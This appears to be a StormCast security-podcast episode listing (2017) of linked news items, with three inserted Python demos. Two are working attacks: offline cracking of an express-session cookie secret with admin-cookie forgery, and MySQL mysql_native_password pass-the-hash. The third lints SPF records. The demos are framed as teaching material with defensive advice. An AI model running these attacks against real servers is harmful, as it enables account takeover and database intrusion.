TP-Link Modem Responds With Admin Password to SMS http://www.theregister.co.uk/2017/04/10/tplink_3gwifi_modem_spills_credentials_to_an_evil_text_message/ Fake Google Maps Listings Redirect to Fraudulent Sites https://www.bleepingcomputer.com/news/google/thousands-of-fake-google-maps-listings-redirect-users-to-fraudulent-sites-each-month/ Apple Fixes Apple Music for Android http://seclists.org/bugtraq/2017/Apr/26 Dallas Sirens Hacked via Wireless Attacks http://www.theregister.co.uk/2017/04/10/hackers_set_off_dallas_emergency_siren_system/ NATO Discovers (finally?) That IPv6 Can Be Used as a Covert Channel https://t.co/FvSSwhtUH7
4/11/2017, 5 hours

ISC StormCast for Monday, April 10th 2017

Domain Whitelisting with Alexa and Umbrella Lists (and update) https://isc.sans.edu/forums/diary/Domain+Whitelisting+With+Alexa+and+Umbrella+Lists/22270/ https://isc.sans.edu/forums/diary/Domain+Whitelisting+With+Alexa+and+Umbrella+Lists+update/22274/ SANS Security West (San Diego) https://www.sans.org/event/sans-security-west-2017 Dallas Tornado Sirens Hacked https://www.washingtonpost.com/news/the-intersect/wp/2017/04/09/someone-hacked-every-tornado-siren-in-dallas-it-was-loud/?utm_term=.ca706deea318 Shadow Brokers Files https://github.com/x0rz/EQGRP Word Zero-Day Vulnerability https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
4/10/2017, 5 hours

ISC StormCast for Friday, April 7th 2017

Automatically Inferring Malware Signatures for Anti-Virus Assisted Attacks https://www.sec.cs.tu-bs.de/pubs/2017-asiaccs.pdf Cisco Aironet Default Credentials https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170405-ame Intercepting Two-Factor Authentication https://breakdev.org/evilginx-advanced-phishing-with-two-factor-authentication-bypass/ QNAP NAS Vulnerabilities https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt
4/7/2017, 5 minutes, 40 seconds

ISC StormCast for Thursday, April 6th 2017

Whitelists: The Holy Grail of Attackers https://isc.sans.edu/forums/diary/Whitelists+The+Holy+Grail+of+Attackers/22262/ Java Struts2 Vulnerability Used to Install Cerber Ransomware https://isc.sans.edu/forums/diary/Java+Struts2+Vulnerability+Used+To+Install+Cerber+Crypto+Ransomware/22264/ Brazilian Bank Loses Control Over Domains https://threatpost.com/lessons-from-top-to-bottom-compromise-of-brazilian-bank/124770/ Google Android April Patch Day https://source.android.com/security/bulletin/2017-04-01#security-vulnerability-summary Radware Observes "BrickerBot" Destroying Devices https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/ Struts2 Vulnerability Webcast https://www.sans.org/webcasts/struts-shock-current-attacks-struts2-defend-104787
4/6/2017, 6 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, April 6th 2017

Whitelists: The Holy Grail of Attackers https://isc.sans.edu/forums/diary/Whitelists+The+Holy+Grail+of+Attackers/22262/ Java Struts2 Vulnerability Used To Install Ransomware https://isc.sans.edu/forums/diary/Java+Struts2+Vulnerability+Used+To+Install+Cerber+Crypto+Ransomware/22264/ Brazilian Bank Looses Control Over Domains https://threatpost.com/lessons-from-top-to-bottom-compromise-of-brazilian-bank/124770/ Google Android April Patch Day https://source.android.com/security/bulletin/2017-04-01#security-vulnerability-summary Radware Observes "BrickerBot" Destroying Devices https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/ Struts2 Vulnerability Webcast https://www.sans.org/webcasts/struts-shock-current-attacks-struts2-defend-104787
4/6/20176 minutes, 25 seconds

ISC StormCast for Wednesday, April 5th 2017

Exploiting Broadcom's Wi-Fi Stack https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html
Covert Channel Between Virtual Machines Via CPU Cache https://cmaurice.fr/pdf/ndss17_maurice.pdf
40 Vulnerabilities in Samsung Tizen https://motherboard.vice.com/en_us/article/samsung-tizen-operating-system-bugs-vulnerabilities
4/5/2017, 5 minutes, 59 seconds

ISC StormCast for Tuesday, April 4th 2017

Apple Releases iOS 10.3.1 to Remedy Wifi Remote Code Execution https://support.apple.com/en-us/HT207688
Practical Use of SHA1 Collisions: ISO Images https://isc.sans.edu/forums/diary/A+Practical+Use+for+a+SHA1+Collision/22257/
Microsoft Defender False Positive https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm%3AWin32%2FBluber.A
Cracking Weak Session Secrets https://martinfowler.com/articles/session-secret.html
Skype Malvertising Advertises Fake Flash Players https://www.bleepingcomputer.com/news/security/skype-malvertising-campaign-pushes-fake-flash-player/
4/4/2017, 5 minutes, 34 seconds
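The "Cracking Weak Session Secrets" item above is about frameworks that sign session cookies with an HMAC keyed by a developer-chosen secret: one captured cookie is enough to brute-force that secret offline, and with the secret an attacker can mint a cookie for any session id. The Python below is an added example written for this page, not code from that article or from any framework. It reproduces the format of the Node cookie-signature library as used by express-session (the value, a dot, then base64 HMAC-SHA256 with the `=` padding removed, the whole thing prefixed with `s:` and URL-encoded in the header), recovers the secret from a constructed cookie with a constructed wordlist, and then forges a cookie. The session id, the captured header, the wordlist and the secret ("keyboard cat", the placeholder that appears in the express-session documentation example) are all set up here for the demonstration.

```python
import base64
import hashlib
import hmac
from urllib.parse import quote, unquote


def b64_nopad(raw: bytes) -> str:
    # cookie-signature strips the trailing '=' padding from the base64 MAC
    return base64.b64encode(raw).decode().rstrip("=")


def sign(value: str, secret: str) -> str:
    """value.base64(HMAC-SHA256(secret, value)), the cookie-signature layout."""
    mac = hmac.new(secret.encode(), value.encode(), hashlib.sha256).digest()
    return f"{value}.{b64_nopad(mac)}"


def unsign(signed: str, secret: str):
    """Return the bare value when the signature verifies under `secret`, else None."""
    value, dot, _ = signed.rpartition(".")
    if not dot:
        return None
    if hmac.compare_digest(sign(value, secret), signed):
        return value
    return None


def session_cookie_value(set_cookie_header: str) -> str:
    """Extract '<id>.<sig>' from a Set-Cookie header; express-session prefixes the value with 's:'."""
    value = unquote(set_cookie_header.split(";", 1)[0].split("=", 1)[1])
    return value[2:] if value.startswith("s:") else value


def crack_secret(signed: str, wordlist):
    """Offline brute force: one HMAC per guess, nothing is sent to the target."""
    for guess in wordlist:
        if unsign(signed, guess) is not None:
            return guess
    return None


def forge(session_id: str, secret: str) -> str:
    """A cookie the server will accept for any session id once the secret is known."""
    return "s:" + sign(session_id, secret)


# Constructed capture (not from a real server): the header an express-session app
# would emit for a made-up session id under the documentation's placeholder secret.
CAPTURED_HEADER = (
    "connect.sid=" + quote("s:" + sign("nXy1z9QkP2", "keyboard cat"), safe="")
    + "; Path=/; HttpOnly"
)
# Constructed wordlist; a real run would use a list of common secrets and framework defaults.
WORDLIST = ["changeme", "secret", "hunter2", "keyboard cat", "letmein"]


def demo():
    """Recover the secret from the captured header, then forge a cookie for a chosen id."""
    signed = session_cookie_value(CAPTURED_HEADER)
    secret = crack_secret(signed, WORDLIST)
    return secret, (forge("ADMIN-SESSION-ID", secret) if secret else None)


if __name__ == "__main__":
    print(demo())
```

The attack costs one HMAC per guess and never touches the server, so rate limiting does not help; the only defences are a long random secret (32 or more random bytes, not a phrase), rotating it, and treating it like any other credential in configuration management.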

ISC StormCast for Monday, April 3rd 2017

Google Discovers More LastPass Vulnerabilities https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6
Attacking KeePass https://www.slideshare.net/harmj0y/a-case-study-in-attacking-keepass https://github.com/HarmJ0y/KeeThief
Bypassing Cylance http://www.blackhillsinfosec.com/?p=5792
MimiPenguin: Extracting Credentials From Memory on Linux https://github.com/huntergregal/mimipenguin
Windows 2003 / IIS 6 Exploit https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html https://github.com/rapid7/metasploit-framework/pull/8162
4/3/2017, 5 minutes, 59 seconds

ISC StormCast for Friday, March 31st 2017

Diverting built-in features for the bad https://isc.sans.edu/forums/diary/Diverting+builtin+features+for+the+bad/22250/
Fake Job Offers to GitHub Developers Include Malware http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/
Drones With Lasers! https://arxiv.org/pdf/1703.07751.pdf
3/31/2017, 5 minutes, 41 seconds

ISC StormCast for Thursday, March 30th 2017

Logical and Physical Security Correlation https://isc.sans.edu/forums/diary/Logical+Physical+Security+Correlation/22243/
Recent Mirai DDoS Attacks https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html
Crusader Injects Fake Support Phone Numbers into Websites https://www.bleepingcomputer.com/news/security/adware-replaces-phone-numbers-for-security-firms-returned-in-search-results/
VMware Closes Pwn2Own Guest Escape Vulnerabilities http://www.vmware.com/security/advisories/VMSA-2017-0006.html
Apple iCloud for Windows Update https://support.apple.com/de-de/HT207607
3/30/2017, 5 minutes, 8 seconds

ISC StormCast for Wednesday, March 29th 2017

New Exploit Variant for Recent Struts2 Vulnerability https://blog.gdssecurity.com/labs/2017/3/27/an-analysis-of-cve-2017-5638.html
PoC Exploit for iBook ePub Javascript Vulnerability https://s1gnalcha0s.github.io/ibooks/epub/2017/03/27/This-book-reads-you-using-JavaScript.html
Microsoft Docs.com Leak https://twitter.com/gossithedog/status/845446263244050434
Symantec SSL CA tool https://www.renditioninfosec.com/socapps/sslcheck/index.php
3/29/2017, 5 minutes, 29 seconds

ISC StormCast for Tuesday, March 28th 2017

Apple Updates https://support.apple.com/en-us/HT201222
IIS 6 / Windows Server 2003 Exploit https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py
Symantec SSL Update https://www.symantec.com/connect/blogs/message-our-ca-customers
3/28/2017, 6 minutes, 46 seconds

ISC StormCast for Monday, March 27th 2017

Google Announces Removal of Symantec CAs for Extended Validation https://www.symantec.com/connect/blogs/symantec-backs-its-ca https://groups.google.com/a/chromium.org/forum/#!topic/blink-dev/eUAKwjihhBs https://chromium.googlesource.com/chromium/src/+/master/net/data/ssl/symantec/README.md
Spoofing Referrer in Microsoft Edge https://www.brokenbrowser.com/referer-spoofing-patch-bypass/
Smart TV Compromise Via Broadcast Signals https://www.youtube.com/watch?v=bOJ_8QHX6OA
Defending Web Applications Class https://www.sans.org/event/sans-security-west-2017/course/defending-web-applications-security-essentials
3/27/2017, 6 minutes, 33 seconds

ISC StormCast for Friday, March 24th 2017

"Swearing Trojan" Uses Fake BTSs To Spread Malware http://blog.checkpoint.com/2017/03/21/swearing-trojan-continues-rage-even-authors-arrest/
LastPass Updates ClickJacking Exploit (Again) https://bugs.chromium.org/p/project-zero/issues/detail?id=1188&desc=2
Application Verifier "Bug" https://github.com/ionescu007/HookingNirvana/blob/master/Esoteric%20Hooks.pdf
3/24/2017, 6 minutes, 35 seconds

ISC StormCast for Thursday, March 23rd 2017

Criminals Threaten to Erase Millions of iCloud Connected Apple Devices https://motherboard.vice.com/en_us/article/hackers-we-will-remotely-wipe-iphones-unless-apple-pays-ransom?utm_source=vicefbus
Siemens Control Systems Affected by Fake Firmware https://dragos.com/blog/mimics/
GitHub Used for C&C http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/
Adium IM Vulnerable to Older libpurple Issue http://seclists.org/fulldisclosure/2017/Mar/57
3/23/2017, 5 minutes, 59 seconds

ISC StormCast for Wednesday, March 22nd 2017

Password Encrypted Word File Delivers Malware https://isc.sans.edu/forums/diary/Malspam+with+passwordprotected+Word+documents/22203/
Critical LastPass Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1209
Nest Camera Bluetooth Vulnerability https://github.com/jasondoyle/Google-Nest-Cam-Bug-Disclosures/blob/master/README.md
3/22/2017, 5 minutes, 27 seconds

ISC StormCast for Tuesday, March 21st 2017

Cisco Releases Advisory With Details Regarding CMP Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
Pwn2Own Contest Leads to Exploits Against All Browsers (and VM!) https://www.zerodayinitiative.com/blog/2017/3/17/the-results-pwn2own-2017-day-three
Git Moving Away From SHA1 (likely to SHA3) https://news.ycombinator.com/item?id=13906804
Proxy Security https://isc.sans.edu/forums/diary/What+is+really+being+proxied/22165/ https://www.us-cert.gov/ncas/alerts/TA17-075A
3/21/2017, 6 minutes

ISC StormCast for Monday, March 20th 2017

An Example of a Multiple Stages Dropper https://isc.sans.edu/forums/diary/Example+of+Multiple+Stages+Dropper/22197/
Real-World Wiretapping Attacks Against ZRTP https://www.ibr.cs.tu-bs.de/papers/schuermann-popets2017.pdf
Authenticating Against MySQL Server Using a Hashed Password https://github.com/cyrus-and/mysql-unsha1
3/20/2017, 5 minutes, 50 seconds
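The mysql-unsha1 item above turns on how MySQL's mysql_native_password handshake works: the server stores SHA1(SHA1(password)), the client proves it knows SHA1(password), and anyone who holds a dump of mysql.user plus one captured handshake can recover SHA1(password) and then authenticate without ever learning the password. The Python below is an added example written for this page, not the tool's own code. It implements both sides of the scramble arithmetic, recovers the first-stage hash from a captured (here, constructed) exchange, and shows that the recovered value alone answers a fresh challenge while a straight replay does not. The password and the scrambles are made up for the demonstration.

```python
import hashlib
import os


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def stage1_hash(password: str) -> bytes:
    """SHA1(password): what the client must know. The server never stores it."""
    return sha1(password.encode())


def stored_hash(password: str) -> bytes:
    """SHA1(SHA1(password)): the value kept in mysql.user (displayed as *HEX)."""
    return sha1(stage1_hash(password))


def client_response(stage1: bytes, scramble: bytes) -> bytes:
    """Client side of mysql_native_password. Input is the first-stage hash, not the password."""
    stage2 = sha1(stage1)
    return xor(stage1, sha1(scramble + stage2))


def server_verify(response: bytes, scramble: bytes, stored: bytes) -> bool:
    """Server side: strip the XOR using the stored hash, then check what remains hashes to it."""
    candidate = xor(response, sha1(scramble + stored))
    return sha1(candidate) == stored


def recover_stage1(response: bytes, scramble: bytes, stored: bytes) -> bytes:
    """The server's own verification step, run offensively: a mysql.user dump plus one
    sniffed handshake (scramble and response) yields SHA1(password), which
    client_response() accepts as a credential for any later connection."""
    return xor(response, sha1(scramble + stored))


def demo(password: str = "correct horse battery", scramble: bytes = None) -> dict:
    """Constructed exchange: a legitimate login, then replay and pass-the-hash attempts."""
    scramble = scramble or os.urandom(20)        # server sends 20 random bytes per connection
    stored = stored_hash(password)               # attacker has this from a database dump
    response = client_response(stage1_hash(password), scramble)  # attacker sniffed this
    recovered = recover_stage1(response, scramble, stored)
    fresh = os.urandom(20)                       # the next connection gets a new scramble
    return {
        "legit_login_ok": server_verify(response, scramble, stored),
        "replay_ok": server_verify(response, fresh, stored),          # False: scramble differs
        "pass_the_hash_ok": server_verify(client_response(recovered, fresh), fresh, stored),
        "recovered_is_sha1_password": recovered == stage1_hash(password),
    }


if __name__ == "__main__":
    print(demo())
```

The per-connection scramble defeats replay but not pass-the-hash, because the stored hash is all the server needs to unmask the client's response. Treat mysql.user contents as credentials, run the protocol only over TLS so handshakes cannot be captured, and on servers that support it prefer caching_sha2_password over mysql_native_password.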

ISC StormCast for Friday, March 17th 2017

Certain Ubiquiti Equipment Vulnerable to CSRF/Code Execution https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170316-0_Ubiquiti_Networks_authenticated_command_injection_v10.txt
Proton Mac OS RAT https://www.cybersixgill.com/proton-a-new-mac-os-rat/
Linux Kernel n_hdlc Privilege Escalation http://seclists.org/oss-sec/2017/q1/569
VMware Copy/Paste Exploit Fixed https://www.vmware.com/security/advisories/VMSA-2017-0005.html
3/17/2017, 6 minutes, 4 seconds

ISC StormCast for Thursday, March 16th 2017

Twitter App "Twitter Counter" Compromise Leads to Unauthorized Tweets From a Large Number of Accounts https://twitter.com/thecounter
Telegram and WhatsApp Image Vulnerability http://blog.checkpoint.com/2017/03/15/check-point-discloses-vulnerability-whatsapp-telegram/
RSA Panel Webcast https://cc.readytalk.com/registration/#/?meeting=6oowksc223hm&campaign=ijmt1z8qsc1q
3/16/2017, 6 minutes, 31 seconds

ISC StormCast for Wednesday, March 15th 2017

Microsoft's Double Patch Tuesday https://isc.sans.edu/forums/diary/February+and+March+Microsoft+Patch+Tuesday/22185/
3/15/2017, 5 minutes, 54 seconds

ISC StormCast for Tuesday, March 14th 2017

Creating SHA3 Hashes with sigs.py https://isc.sans.edu/forums/diary/New+tool+sigspy/22181/
Canada Revenue Agency Website Attacked / Down over Struts2 http://www.cbc.ca/news/politics/cra-internet-vulnerability-government-1.4022591
Webkit Exploit Adapted to Nintendo Switch https://www.youtube.com/watch?v=xkdPjbaLngE
Analysis of Outdated Javascript Libraries on the Web http://www.ccs.neu.edu/home/arshad/publications/ndss2017jslibs.pdf
GitHub Enterprise SAML Authentication Bypass http://www.economyofmechanism.com/github-saml
3/14/2017, 5 minutes, 42 seconds

ISC StormCast for Monday, March 13th 2017

Issues With Out Of Date Geo Location Databases https://isc.sans.edu/forums/diary/The+Side+Effect+of+GeoIP+Filters/22173/
Recovering Mobile Device PINs via Thermal Images http://www.mkhamis.com/data/papers/abdelrahman2017chi.pdf
Unmasking Randomized MAC Addresses https://arxiv.org/abs/1703.02874v1
Mobile Phone Supply Chain Attacks http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/
3/13/2017, 6 minutes, 36 seconds

ISC StormCast for Friday, March 10th 2017

Struts 2 Update https://isc.sans.edu/forums/diary/Critical+Apache+Struts+2+Vulnerability+Patch+Now/22169/
Exploits Against Haraka Mail Server https://github.com/outflanknl/Exploits/blob/master/harakiri-CVE-2016-1000282.py
Android Password Stealing Apps http://www.welivesecurity.com/2017/03/09/new-instagram-credentials-stealers-discovered-google-play/
Drupal Services Module Vulnerability and Exploit https://www.ambionics.io/blog/drupal-services-module-rce https://www.drupal.org/node/2858847
3/10/2017, 5 minutes, 18 seconds

ISC StormCast for Thursday, March 9th 2017

Security Researchers Target Nintendo Switch https://twitter.com/qlutoo https://www.youtube.com/watch?v=CwdDN1kA93Q&feature=youtu.be
Dockerscan https://github.com/cr0hn/dockerscan
1 in 5 Websites still rely on SHA-1 Based Certificates http://www.theregister.co.uk/2017/03/08/sha1_certificate_survey/
Not All Malware Samples Are Complex https://isc.sans.edu/forums/diary/Not+All+Malware+Samples+Are+Complex/22163/
Struts Vulnerability Included in Metasploit https://github.com/rapid7/metasploit-framework/issues/8064 https://cwiki.apache.org/confluence/display/WW/S2-045?from=groupmessage
3/9/2017, 5 minutes, 37 seconds

ISC StormCast for Wednesday, March 8th 2017

CIA Leak (note that the link leads directly to the leaked documents) https://wikileaks.com/ciav7p1/
From Shamoon To StoneDrill: Evolution of Wipers Attacking Saudi Organizations https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf
WordPress Update https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reading Secret Keys From SGX Enclaves https://arxiv.org/abs/1702.08719
3/8/2017, 6 minutes, 41 seconds

ISC StormCast for Tuesday, March 7th 2017

Typosquatting Against Santander Bank in Brazil With Phone Call Follow-up https://isc.sans.edu/forums/diary/A+very+convincing+Typosquatting+Social+Engineering+campaign+is+targeting+Santander+corporate+customers+in+Brazil/22157/
Post Mortem on 911 DDoS Attack https://www.wsj.com/articles/how-a-cyberattack-overwhelmed-the-911-system-1488554972
Nextcloud/Owncloud Scanner https://scan.nextcloud.com
Western Digital MyCloud Vulnerability https://blog.exploitee.rs/2017/hacking_wd_mycloud/
3/7/2017, 6 minutes, 22 seconds

ISC StormCast for Monday, March 6th 2017

How Your Pictures Affect Your Website Reputation https://isc.sans.edu/forums/diary/How+your+pictures+may+affect+your+website+reputation/22151/
De-Obfuscating Padded Code https://isc.sans.edu/forums/diary/Another+example+of+maldoc+string+obfuscation+with+extra+bonus+UAC+bypass/22153/
Foxit PDF Reader Vulnerability https://www.foxitsoftware.com/support/security-bulletins.php#content-2017
Applying SHA1 Shatter Attack To BitTorrent https://biterrant.io
Gargoyle Memory Scanning Evasion https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html
Attacking Synergy Clients https://www.n00py.io/2017/03/compromising-synergy-clients-with-a-rogue-synergy-server/
3/6/2017, 6 minutes, 4 seconds

ISC StormCast for Friday, March 3rd 2017

Business E-Mail Compromise and Sender Policy Framework (SPF) Typos https://isc.sans.edu/forums/diary/Phishing+for+Big+Money+Wire+Transfers+is+Still+Alive+and+Well+or+For+Want+of+Good+Punctuation+all+was+Lost/22141/
Android Developers Infected With Malware Publishing Malicious Apps http://researchcenter.paloaltonetworks.com/2017/03/unit42-google-play-apps-infected-malicious-iframes/
DBLTek GoIP Backdoor https://www.trustwave.com/Resources/SpiderLabs-Blog/Undocumented-Backdoor-Account-in-DBLTek-GoIP/
Decrypting Findzip/Patcher Ransomware https://blog.malwarebytes.com/cybercrime/2017/02/decrypting-after-a-findzip-ransomware-infection/
3/3/2017, 5 minutes, 29 seconds
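The SPF item above is about a record in which a punctuation slip changed what the policy actually said, so spoofed mail used in a wire-transfer fraud was not rejected. The Python below is an added example written for this page, not the diary's code: a static linter for one SPF TXT record that flags the slips that silently weaken a policy (an unknown mechanism, a space where a colon belongs, a truncated or missing `all`, a permissive `+all`, an address that does not match its `ip4`/`ip6` mechanism, terms placed after `all`) and counts DNS-querying terms against the RFC 7208 limit of ten. The sample records are constructed and belong to no real domain; the checker does no DNS lookups, so `include:` targets are not followed and the lookup count is a lower bound.

```python
import ipaddress

# Mechanisms and modifiers defined by RFC 7208; anything else is a typo as far as SPF is concerned.
MECHANISMS = {"all", "include", "a", "mx", "ptr", "ip4", "ip6", "exists"}
NEEDS_ARG = {"include", "ip4", "ip6", "exists"}
DNS_LOOKUP = {"include", "a", "mx", "ptr", "exists"}   # count toward the 10-lookup limit
QUALIFIERS = "+-~?"


def lint_spf(record: str) -> list:
    """Return the problems found in one TXT record; an empty list means syntactically clean."""
    problems = []
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["record must start with 'v=spf1'"]
    lookups = 0
    seen_all = False
    has_redirect = False
    for raw in terms[1:]:
        if seen_all:
            problems.append(f"'{raw}' comes after 'all' and is never evaluated")
            continue
        if "=" in raw:                      # modifiers: redirect=domain, exp=domain
            name, _, arg = raw.partition("=")
            name = name.lower()
            if name not in ("redirect", "exp"):
                problems.append(f"unknown modifier '{raw}'")
            elif not arg:
                problems.append(f"modifier '{name}' has no domain")
            if name == "redirect":
                has_redirect = True
                lookups += 1
            continue
        term = raw
        qual = "+"
        if term and term[0] in QUALIFIERS:
            qual, term = term[0], term[1:]
        name, sep, arg = term.partition(":")
        if not sep:
            name = name.partition("/")[0]   # 'a/24' and 'mx/24' carry a CIDR without ':'
        name = name.lower()
        if name not in MECHANISMS:
            problems.append(f"unknown mechanism '{raw}' (typo?)")
            continue
        if name in NEEDS_ARG and not arg:
            problems.append(f"'{name}' needs an argument, e.g. {name}:<value>")
        if name in ("ip4", "ip6") and arg:
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                problems.append(f"'{raw}' is not a valid address or CIDR")
            else:
                if (name == "ip4") != (net.version == 4):
                    problems.append(f"'{raw}' address family does not match the mechanism")
        if name in DNS_LOOKUP:
            lookups += 1
        if name == "all":
            seen_all = True
            if qual == "+":
                problems.append("'+all' passes every sender; use '-all' or '~all'")
    if not seen_all and not has_redirect:
        problems.append("no 'all' mechanism: senders not listed get a neutral result")
    # Only the top-level record is counted; include: targets add their own lookups.
    if lookups > 10:
        problems.append(f"{lookups} DNS-querying terms exceed the limit of 10 (permerror)")
    return problems


# Constructed records for the demonstration; none belongs to a real domain.
SAMPLES = {
    "clean":           "v=spf1 ip4:203.0.113.0/24 include:_spf.example.net mx -all",
    "space_for_colon": "v=spf1 include _spf.example.net -all",
    "truncated_all":   "v=spf1 ip4:203.0.113.0/24 ~al",
    "wide_open":       "v=spf1 mx +all",
    "wrong_family":    "v=spf1 ip4:2001:db8::/32 -all",
}


def lint_all(records: dict) -> dict:
    """Lint several records at once; handy for a batch pulled from a DNS export."""
    return {name: lint_spf(rec) for name, rec in records.items()}


if __name__ == "__main__":
    for name, found in lint_all(SAMPLES).items():
        print(name, "->", found or "ok")
```

Run it against your own domains' TXT records before an attacker does; a record that parses but ends in `~al` or `include example.net` is not an error to DNS, only to the mail receivers you expected to reject the spoof.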

ISC StormCast for Thursday, March 2nd 2017

LDAP and STARTTLS https://isc.sans.edu/forums/diary/SSLTLS+on+port+389+Say+what/22135/
WordPress NextGen Gallery Plugin SQL Injection Vulnerability https://blog.sucuri.net/2017/02/sql-injection-vulnerability-nextgen-gallery-wordpress.html
Password Manager Insecurities https://team-sik.org/trent_portfolio/password-manager-apps/
Slack Insecure Cross Window Messaging https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/
Google Voice Recognition Used to Break Google reCAPTCHA Audio Challenge https://east-ee.com/2017/02/28/rebreakcaptcha-breaking-googles-recaptcha-v2-using-google/
3/2/2017, 6 minutes

ISC StormCast for Wednesday, March 1st 2017

Amazon Cloud IPv4 Reuse Leads to Stray Requests https://isc.sans.edu/forums/diary/My+Catch+Of+4+Months+In+The+Amazon+IP+Address+Space/22129
Amazon S3 Outage https://isc.sans.edu/forums/diary/Amazon+S3+Outage/22131/
CloudPets Leaks Recordings https://www.troyhunt.com/data-from-connected-cloudpets-teddy-bears-leaked-and-ransomed-exposing-kids-voice-messages/
ESET Antivirus Vulnerability Puts Macs at Risk http://seclists.org/fulldisclosure/2017/Feb/68
Analysis of a Simple PHP Backdoor https://isc.sans.edu/forums/diary/Analysis+of+a+Simple+PHP+Backdoor/22127/
3/1/2017, 5 minutes, 23 seconds

ISC StormCast for Tuesday, February 28th 2017

Google Chrome TLS 1.3 Update Causes Issues With Bluecoat https://bugs.chromium.org/p/chromium/issues/detail?id=694593
Windows 10 Will Implement "Gatekeeper" Like Technology https://twitter.com/vitorgrs/status/835674417602637824
Google Releases E2EMail Chrome Plugin https://security.googleblog.com/2017/02/e2email-research-project-has-left-nest_24.html
Decrypting SCOM "RunAs" Credentials https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/february/scomplicated-decrypting-scom-runas-credentials/
2/28/2017, 5 minutes, 55 seconds

ISC StormCast for Monday, February 27th 2017

Cloudflare Leaks Data https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/
IE/Edge Denial of Service https://bugs.chromium.org/p/project-zero/issues/detail?id=1011#c2
"Dynamite Phishing" https://isc.sans.edu/forums/diary/Dynamite+Phishing/22121/
Google Credentials Problems https://productforums.google.com/forum/#!category-topic/gmail/LOt2x1_c3KM
2/27/2017, 5 minutes, 17 seconds
Episode Artwork

ISC StormCast for Friday, February 24th 2017

Researchers Find SHA1 Collision https://shattered.io/static/shattered.pdf
Arrest Made in Deutsche Telekom DSL Modem Attack https://www.bleepingcomputer.com/news/security/uk-police-arrest-suspect-behind-mirai-malware-attacks-on-deutsche-telekom/
2/24/2017 (5 minutes, 32 seconds)

ISC StormCast for Thursday, February 23rd 2017

User Centric Mobile Device Security With Stethoscope http://techblog.netflix.com/2017/02/introducing-netflix-stethoscope.html
Fingerprinting Firefox With Intermediate Certificates https://shiftordie.de/blog/2017/02/21/fingerprinting-firefox-users-with-cached-intermediate-ca-certificates-fiprinca/
JudasDNS Attack DNS Proxy https://github.com/mandatoryprogrammer/JudasDNS
2/23/2017 (5 minutes, 23 seconds)

ISC StormCast for Wednesday, February 22nd 2017

Microsoft Releases Flash Patch From Skipped February Update https://technet.microsoft.com/en-us/library/security/MS17-005
Investigating Off-Premise Wireless Behaviour https://isc.sans.edu/forums/diary/Investigating+OffPremise+Wireless+Behaviour+or+I+Know+What+You+Connected+To/22089/
"Bugdrop" Steals Large Amount of Audio https://cyberx-labs.com/en/blog/operation-bugdrop-cyberx-discovers-large-scale-cyber-reconnaissance-operation/
2/22/2017 (5 minutes, 2 seconds)

ISC StormCast for Tuesday, February 21st 2017

Hardening Postfix Against FTP Relay Attacks https://isc.sans.edu/forums/diary/Hardening+Postfix+Against+FTP+Relay+Attacks/22086/
Kaspersky Examines Mobile Car Apps https://securelist.com/analysis/publications/77576/mobile-apps-and-stealing-a-connected-car/
Cars "Remember" Prior Owners http://money.cnn.com/2017/02/17/technology/used-car-hack-safety-location/
Xen Project Reconsidering Vulnerability Disclosure Policy https://blog.xenproject.org/2017/02/14/request-for-comment-scope-of-vulnerabilities-for-which-xsas-are-issued/
Stagefright Vulnerability Had Minimal Effect on Android Security https://www.rsaconference.com/speakers/adrian_ludwig
2/21/2017 (5 minutes, 55 seconds)

ISC StormCast for Monday, February 20th 2017

RTRBK: Router, Switch, Firewall Backups in PowerShell https://isc.sans.edu/forums/diary/RTRBK+Router+Switch+Firewall+Backups+in+PowerShell+tool+drop/22079/
Windows EMF Image 0-Day Memory Leak https://bugs.chromium.org/p/project-zero/issues/detail?id=992
Brazilian Traffic Ticket Malspam https://isc.sans.edu/forums/diary/Brazilian+malspam+sends+Autoitbased+malware/22081/
Using XXE To Send E-Mail https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/
2/20/2017 (5 minutes, 27 seconds)

ISC StormCast for Friday, February 17th 2017

AVM Private Key Leak Puts Cable Modems At Risk https://isc.sans.edu/forums/diary/AVM+Private+Key+Leak+Puts+Cable+Modems+Worldwide+At+Risk/22076/
OpenSSL Update https://isc.sans.edu/forums/diary/OpenSSL+110e+Update+No+need+to+panic+openssl/22074/
Microsoft Update Delayed https://blogs.technet.microsoft.com/msrc/2017/02/14/february-2017-security-update-release/
ANC Attack ASLR Bypass https://www.vusec.net/projects/anc/
2/17/2017 (7 minutes, 9 seconds)

ISC StormCast for Thursday, February 16th 2017

